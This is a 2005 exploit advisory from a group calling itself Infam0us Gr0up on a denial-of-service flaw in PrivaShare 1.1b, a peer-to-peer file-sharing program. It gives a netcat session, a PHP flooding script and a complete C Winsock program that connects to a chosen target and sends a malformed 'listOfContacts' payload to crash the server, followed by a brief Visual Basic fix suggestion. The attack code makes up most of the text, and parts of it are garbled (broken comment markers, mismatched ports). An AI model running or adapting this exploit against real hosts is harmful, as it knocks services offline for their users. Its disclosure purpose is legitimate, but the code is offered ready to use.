Update:
17:23 05/07/2005
Subject:
" PrivaShare TCP/IP DoS Exploit "
Vulnerable version:
PrivaShare 1.1b
- Affected to lastest version
Operating System:
- WINDOWS 98
- WINDOWS NT
- WINDOWS XP
- WINDOWS 2000
Description:
The program is a peer-to-peer TCP/IP application that lets you share files from the directory of your choice,
download files from other machines running the program to the directory of your choice, upload files
to otherse, chat with whomever is connected to you, and search for files on other machines running the
application.
Vulnerability:
By sending a especially incorrect request to the program it is possible cause
to crash.Also can send command specified to console then execute it self.
Exam:
E:\>nc -v localhost 2001 'Its default server port application
Infam0us-Gr0up [127.0.0.1] 2001 (?) open
myInfo,Newbie,127.0.0.1,yes,0,null
[command]' Only command aviliable can accepted by server
myInfo = The information currently connected to server
Newbie = Name user account for the server
127.0.0.1 = Local IP
yes = If share permission 'no' this mean was blocked for transfer file by administration
0,null = Output line
'Use command 'print,[text]' to send text message at server application.
?php
$url = "localhost";
$command = "print,FLOOD..FLOOD..FLOOD..FLOOD..FLOOD..FLOOD"; */ Send text to server client /*;
$fp = fsockopen ("$url", 1001, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)\n";
} else {
fputs ($fp, "$command");
while (!feof($fp)) {
echo fgets ($fp,1024);
}
fclose ($fp);
}
?
Command aviliable:
myInfo = Connect to server application as ' myInfo'
requestContacts = Refresh a connection to see who they're connected to.
listOfContacts = Receiving contact list from a connection.
showFiles = List files.
uploadingFile = Upload a file.
print, = send message to server ,exam:'print,HAI...dude?'
All command is aviliable,you can search by self!
Exploit:
/*
PrivaShare TCP/IP DoS Exploit
----------------------------------------
Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed
Tested on Windows2000 SP4
Greats: Infam0us Gr0up Team/member,and ll of u..take care!
Info:
- infamous.2hell.com
- basher13@linuxmail.org
*/
#include string.h
#include winsock2.h
#include stdio.h
#pragma comment(lib, "ws2_32.lib")
char doscore[] =
/*
Offset 0000ca10 to 0000ca2b
0000ca10 6c 00 69 00 73 00 74 00 4f 00 66 00 43 00
6f 00 6e 00 74 00 61 00 63 00 74 00 73 00
HEX:
6c 20 69 20 73 20 74 20 4f 20 66 20 43 20 6f 20 6e 20 74
20 61 20 63 20 74
*/
"listOfContacts,null"
"*** PrivaShare TCP/IP DoS Exploit \n"
"***-----------------------------------------------\n"
"*** Infam0us Gr0up - Securiti Research Team \n\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;
if (argc < 2)
{
printf(" PrivaShare TCP/IP DoS Exploit \n", argv[0]);
printf(" ------------------------------------------\n", argv[0]);
printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: %s localhost 2001\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 2001;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" PrivaShare TCP/IP DoS Exploit \n", argv[0]);
printf(" ------------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target locked\n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server DoS'ed\n");
closesocket(inetdos);
WSACleanup();
return 0;
}
Solution:
Other advice fix a line at 'frmMAin.frm',this can make the machine
will keep still alive.
Private Sub Winsock1_DataArrival(Index As Integer, ByVal bytesTotal As Long)
(..)
cutString strCut, Incoming 'Take out first string to see if theres info coming.
Incoming = strCut & "," & Incoming 'Then put it back in to be compatable with sub call.
If strCut > 0 Then
getConnections Index, Incoming
End If
(..)
Vendor URL:
WWW - http://www.freevbcode.com/ShowCode.Asp?ID=2742
Email - geno@localaccess.com
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com